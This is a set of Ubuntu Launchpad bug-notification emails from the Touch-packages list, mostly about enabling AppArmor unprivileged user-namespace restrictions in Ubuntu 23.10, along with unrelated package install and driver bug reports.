Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu. https://bugs.launchpad.net/bugs/2044625 Title: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: зацикливание триггеров, отмена работы Status in gdk-pixbuf package in Ubuntu: New Bug description: ubuntu update to lunar lobster version ProblemType: Package DistroRelease: Ubuntu 23.04 Package: libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 ProcVersionSignature: Ubuntu 5.15.0-89.99-generic 5.15.126 Uname: Linux 5.15.0-89-generic x86_64 ApportVersion: 2.26.1-0ubuntu2.1 Architecture: amd64 CasperMD5CheckResult: unknown Date: Sun Nov 26 02:02:30 2023 ErrorMessage: зацикливание триггеров, отмена работы InstallationDate: Installed on 2023-11-25 (0 days ago) InstallationMedia: Ubuntu 20.04.6 LTS "Focal Fossa" - Release amd64 (20230316) Python3Details: /usr/bin/python3.11, Python 3.11.4, python3-minimal, 3.11.2-1 PythonDetails: N/A RebootRequiredPkgs: Error: path contained symlinks. RelatedPackageVersions: dpkg 1.21.21ubuntu1 apt 2.6.0ubuntu0.1 SourcePackage: gdk-pixbuf Title: package libgdk-pixbuf-2.0-0:amd64 2.42.10+dfsg-1build1 failed to install/upgrade: зацикливание триггеров, отмена работы UpgradeStatus: Upgraded to lunar on 2023-11-25 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gdk-pixbuf/+bug/2044625/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2043711] Re: Open3.pm tries to run code in /tmp when updating ubuntu-drivers-common
I am struggling to see the vulnerability here still - the path used in this case is /tmp/ubuntu-drivers-common.config.55GJ8b appears to have a randomly generated suffix and so couldn't have been guessed beforehand nor preseeded with other contents by a local attacker - so the only way then that I can see that this could be a vulnerability would be if this file was world-writable - but it is not clear that this is the case either. Assuming this file comes from debconf, from what I can see in its sources, it creates temporary files via the https://perldoc.perl.org/File::Temp package - which states that files are created with permissions 0600 by default too. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to perl in Ubuntu. https://bugs.launchpad.net/bugs/2043711 Title: Open3.pm tries to run code in /tmp when updating ubuntu-drivers-common Status in perl package in Ubuntu: Invalid Bug description: During update of ubuntu-drivers-common: Can't exec "/tmp/ubuntu-drivers-common.config.55GJ8b": Permission denied at /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm line 178, line 1. open2: exec of /tmp/ubuntu-drivers-common.config.55GJ8b configure 1:0.9.6.2~0.22.04.4 failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59. Preconfiguring packages ... Can't exec "/tmp/ubuntu-drivers-common.config.uSPrCH": Permission denied at /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm line 178, line 1. open2: exec of /tmp/ubuntu-drivers-common.config.uSPrCH configure 1:0.9.6.2~0.22.04.4 failed: Permission denied at /usr/share/perl5/Debconf/ConfModule.pm line 59. /tmp is mounted with noexec because running code from /tmp has been a vulnerability vector for several decades, hence reporting this as a vulnerability in perl-base. This error did not appear to prevent the update of ubuntu-drivers- common and "dpkg --verify ubuntu-drivers-common" returns 0. ___ Attempting to use the package search on this form by clicking the created a modal in which there is an error Sorry, something went wrong with your search. We've recorded what happened, and we'll fix it as soon as possible. (Error ID: OOPS-c80f71590b02908a1187b9f743c53eac) which is repeated with any attempt to search for a package. ___ Submitting this form gives an error "perl-base" does not exist in Ubuntu. Please choose a different package. If you're unsure, please select "I don't know" $ dpkg -S /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm perl-base: /usr/lib/x86_64-linux-gnu/perl-base/IPC/Open3.pm $ dpkg -l perl-base Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-==-=--=> ii perl-base 5.34.0-3ubuntu1.2 amd64minimal Perl system Looks like a package to me. Nevertheless, using "Did you mean..." offers "perl". ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: perl-base 5.34.0-3ubuntu1.2 ProcVersionSignature: Ubuntu 6.5.0-1007.7-oem 6.5.3 Uname: Linux 6.5.0-1007-oem x86_64 ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Thu Nov 16 10:08:48 2023 InstallationDate: Installed on 2016-04-23 (2763 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) ProcEnviron: TERM=rxvt PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: perl UpgradeStatus: Upgraded to jammy on 2022-08-19 (453 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/perl/+bug/2043711/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2040484] Re: ubuntu_seccomp pseudo-syscall fails on s390
Adding a task against libseccomp until we know more about where the bug lies. ** Also affects: libseccomp (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu. https://bugs.launchpad.net/bugs/2040484 Title: ubuntu_seccomp pseudo-syscall fails on s390 Status in ubuntu-kernel-tests: New Status in libseccomp package in Ubuntu: New Bug description: libseccomp upstream has changed the test code for 29-sim- pseudo_syscall.c, which has broken it for s390. Perhaps s390 has been broken since forever and the test change is just uncovering it. We need to investigate if the fix would be needed in the test, libseccomp or the kernel. This seems to affect at least 4.4 and 5.4 kernels, but may affect everything. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu-kernel-tests/+bug/2040484/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2039589] Re: Nwidia driver Ubuntu bug
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/2039589 Title: Nwidia driver Ubuntu bug Status in xorg package in Ubuntu: New Bug description: Nvidia driver error 470: UFW main window not displayed properly and Help not displayed. The issue affects Ubuntu 22.04.3 LTS, Ubuntu 23.10 and Linux Mint. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 6.2.0-34.34~22.04.1-generic 6.2.16 Uname: Linux 6.2.0-34-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file. .proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 470.199.02 Thu May 11 11:46:56 UTC 2023 GCC version: ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 BootLog: Error: [Errno 13] Brak dostępu: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Tue Oct 17 18:13:32 2023 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu GraphicsCard: NVIDIA Corporation GK107 [GeForce GTX 650] [10de:0fc6] (rev a1) (prog-if 00 [VGA controller]) Subsystem: CardExpert Technology GK107 [GeForce GTX 650] [10b0:0fc6] InstallationDate: Installed on 2023-10-16 (1 days ago) InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2) MachineType: Gigabyte Technology Co., Ltd. To be filled by O.E.M. ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=pl_PL.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.2.0-34-generic root=UUID=7faab2db-29fa-4024-ae67-d6f019c15904 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 02/25/2014 dmi.bios.release: 4.6 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 10b dmi.board.asset.tag: To be filled by O.E.M. dmi.board.name: H61M-S1 dmi.board.vendor: Gigabyte Technology Co., Ltd. dmi.board.version: x.x dmi.chassis.asset.tag: To Be Filled By O.E.M. dmi.chassis.type: 3 dmi.chassis.vendor: Gigabyte Technology Co., Ltd. dmi.chassis.version: To Be Filled By O.E.M. dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr10b:bd02/25/2014:br4.6:svnGigabyteTechnologyCo.,Ltd.:pnTobefilledbyO.E.M.:pvrTobefilledbyO.E.M.:rvnGigabyteTechnologyCo.,Ltd.:rnH61M-S1:rvrx.x:cvnGigabyteTechnologyCo.,Ltd.:ct3:cvrToBeFilledByO.E.M.:skuTobefilledbyO.E.M.: dmi.product.family: To be filled by O.E.M. dmi.product.name: To be filled by O.E.M. dmi.product.sku: To be filled by O.E.M. dmi.product.version: To be filled by O.E.M. dmi.sys.vendor: Gigabyte Technology Co., Ltd. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.113-2~ubuntu0.22.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 23.0.4-0ubuntu1~22.04.1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.4-2ubuntu1.7~22.04.1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2039589/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
As discussed with the wider security team, we have decided not to push ahead with this change for mantic and instead will look to enable it very early in the 24.04 devel cycle . Marking as invalid and unsubscribing the release team. ** Changed in: apparmor (Ubuntu) Status: New => Won't Fix -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: Won't Fix Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor Sep 15 07:04:47 sec-mantic-amd64
[Touch-packages] [Bug 2036698] Re: Unprivileged user namespace restrictions break various third-party applications
** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu) Importance: Undecided => High ** Changed in: apparmor (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036698 Title: Unprivileged user namespace restrictions break various third-party applications Status in apparmor package in Ubuntu: Confirmed Bug description: Similar to https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 the proposed unprivileged user namespace restrictions feature of apparmor in mantic breaks various third-party applications that use unprivileged userns for sandboxing themselves. These include: - Brave - Microsoft Edge - Opera - Visual Studio Code - Vivaldi apparmor in mantic should ship skeleton profiles for each of these to ensure they work as expected if a user has them installed. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036698/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036698] [NEW] Unprivileged user namespace restrictions break various third-party applications
Public bug reported: Similar to https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 the proposed unprivileged user namespace restrictions feature of apparmor in mantic breaks various third-party applications that use unprivileged userns for sandboxing themselves. These include: - Brave - Microsoft Edge - Opera - Visual Studio Code - Vivaldi apparmor in mantic should ship skeleton profiles for each of these to ensure they work as expected if a user has them installed. ** Affects: apparmor (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036698 Title: Unprivileged user namespace restrictions break various third-party applications Status in apparmor package in Ubuntu: New Bug description: Similar to https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 the proposed unprivileged user namespace restrictions feature of apparmor in mantic breaks various third-party applications that use unprivileged userns for sandboxing themselves. These include: - Brave - Microsoft Edge - Opera - Visual Studio Code - Vivaldi apparmor in mantic should ship skeleton profiles for each of these to ensure they work as expected if a user has them installed. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036698/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
** Changed in: apparmor (Ubuntu) Status: Incomplete => New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles... Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: Restarting AppArmor Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[308]: disabling unprivileged userns restrictions since unconfined userns is not supported / enabled Sep 15 07:04:47 sec-mantic-amd64 apparmor.systemd[320]: kernel.apparmor_restrict_unprivileged_userns = 0 Sep 15 07:04:47
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
@vorlon - the FFe you approved was to upload a whole new release apparmor-4.0.0~alpha2 with supporting infrastructure for this feature, but crucially it did not enable it at that time (as we wanted more time to add additional profiles for all the packages in the archive so that when then feature gets turned on they would work as before). This new FFe does enable it *and* also adds some logic so that we only enable it when the kernel supports all the required features. This is to ensure that during an upgrade from lunar -> mantic, or when booting an older kernel which doesn't have all the features, we don't enable the sysctl and break applications which expect to be able to use userns. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: Incomplete Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected:
[Touch-packages] [Bug 2036128] Re: [FFe] enable unprivileged user namespace restrictions by default for mantic
FYI I redid this change again on top of the fix from https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2036302 and have uploaded it to the aforementioned PPA (debdiff is almost identical, except for the different context in debian/changelog) ** Patch added: "apparmor_4.0.0~alpha2-0ubuntu5.debdiff" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036128/+attachment/5701789/+files/apparmor_4.0.0~alpha2-0ubuntu5.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2036128 Title: [FFe] enable unprivileged user namespace restrictions by default for mantic Status in apparmor package in Ubuntu: New Bug description: As per https://discourse.ubuntu.com/t/spec-unprivileged-user- namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626, unprivileged user namespace restrictions for Ubuntu 23.10 are to be enabled by default via a sysctl.d conf file in apparmor. In https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2035315 new apparmor profiles were added to the apparmor package for various applications which require unprivileged user namespaces, using a new unconfined profile mode. To support this an additional change was added to the mantic kernel in https://git.launchpad.net/~ubuntu- kernel/ubuntu/+source/linux/+git/mantic/commit?h=master- next=7327726a2dbf571e05f7c095916dcce0347790b4 which is still currently unreleased. Without this kernel change, if userns restrictions are enabled the existing policies added above will not actually work to allow them to be used by the various applications. As such we need to ensure that userns restrictions are not enabled via sysctl when this feature is not present / enabled. Whilst it may be possible to capture the dependency logic via `Breaks:` or similar, this would not help in the case that a user booted into an older kernel with the new apparmor userspace package. As such, as well as enabling the sysctl via the sysctl.d conf file, it is proposed to add logic into the apparmor.service systemd unit to check that the kernel supports the aforementioned unconfined profile mode and that it is enabled - and if not then to force disable the userns restrictions sysctl via the following logic: userns_restricted=$(sysctl -n kernel.apparmor_restrict_unprivileged_userns) unconfined_userns=$([ -f /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns ] && cat /sys/kernel/security/apparmor/features/policy/unconfined_restrictions/userns || echo 0) if [ -n "$userns_restricted" ] && [ "$userns_restricted" -eq 1 ]; then if [ "$unconfined_userns" -eq 0 ]; then # userns restrictions rely on unconfined userns to be supported echo "disabling unprivileged userns restrictions since unconfined userns is not supported / enabled" sysctl -w kernel.apparmor_restrict_unprivileged_userns=0 fi fi this allows a local admin to disable the sysctl via the regular sysctl.d conf approach, but to also make sure we don't inadvertently enable it when it is not supported by the kernel. This proposed change has been tested via the QA Regression Testing project, in particular with the specific test added in https://git.launchpad.net/qa-regression- testing/commit/?id=6f2c5ab7c8659174adac772ce0e894328bb5045d This produces the following output, confirming the fallback works as expected on the current mantic kernel (which does not fully support the userns restrictions): --- Running test: './test-apparmor.py' distro: 'Ubuntu 23.10' kernel: '6.5.0-5.5 (Ubuntu 6.5.0-5.5-generic 6.5.0)' arch: 'amd64' init: 'systemd' uid: 0/0 SUDO_USER: 'ubuntu') test_unconfined_userns (__main__.ApparmorTest.test_unconfined_userns) Test that unconfined userns restrictions are applied ... Skipping private tests WARN: kernel rate limiting in effect Disabling ratelimiting until the next reboot. To renable, run: # sysctl -w kernel.printk_ratelimit=5 (enabling userns restrictions) (restarting apparmor) (checking userns restrictions got disabled) ok -- Ran 1 test in 0.232s OK --- Also we can see on a fresh-boot with this new version installed that apparmor.service shows it has disabled the sysctl before loading any profiles even though the conf file has it enabled - and finally we can see that unshare -U works as expected: root@sec-mantic-amd64:~# uptime 07:04:48 up 0 min, 0 user, load average: 0.00, 0.00, 0.00 root@sec-mantic-amd64:~# journalctl -b0 --unit apparmor.service --no-pager Sep 15 07:04:47 sec-mantic-amd64 systemd[1]: Starting apparmor.service - Load AppArmor profiles...
[Touch-packages] [Bug 2035315] Re: Unprivileged user namespace restrictions break various applications
As seen in https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2036302 it turns out the lxc package already shipped a profile in /etc/apparmor.d/usr.bin.lxc-create - so this profile itself needs to be updated to add the userns permission and declare the new ABI in lxc in mantic. ** Also affects: lxc (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2035315 Title: Unprivileged user namespace restrictions break various applications Status in apparmor package in Ubuntu: Fix Released Status in lxc package in Ubuntu: New Bug description: When the unprivileged user namespace restrictions are enabled, various applications within and outside the Ubuntu archive fail to function, as they use unprivileged user namespaces as part of their normal operation. A search of the Ubuntu archive for the 23.10 release was performed looking for all applications that make legitimate use of the CLONE_NEWUSER argument, the details of which can be seen in https://docs.google.com/spreadsheets/d/1MOPVoTW0BROF1TxYqoWeJ3c6w2xKElI4w-VjdCG0m9s/edit#gid=2102562502 For each package identified in that list, an investigation was made to determine if the application actually used this as an unprivileged user, and if so which of the binaries within the package were affected. The full investigation can be seen in https://warthogs.atlassian.net/browse/SEC-1898 (which is unfortunately private) but is summarised to the following list of Ubuntu source packages, with the affected binaries as noted. NOTE that due to time constraints for some packages it was not possible to finish the complete investigation and so for those *all* the binaries from the package are listed below. For each of these binaries, an apparmor profile is required so that the binary can be granted use of unprivileged user namespaces - an example profile for the ch-run binary within the charliecloud package is shown: $ cat 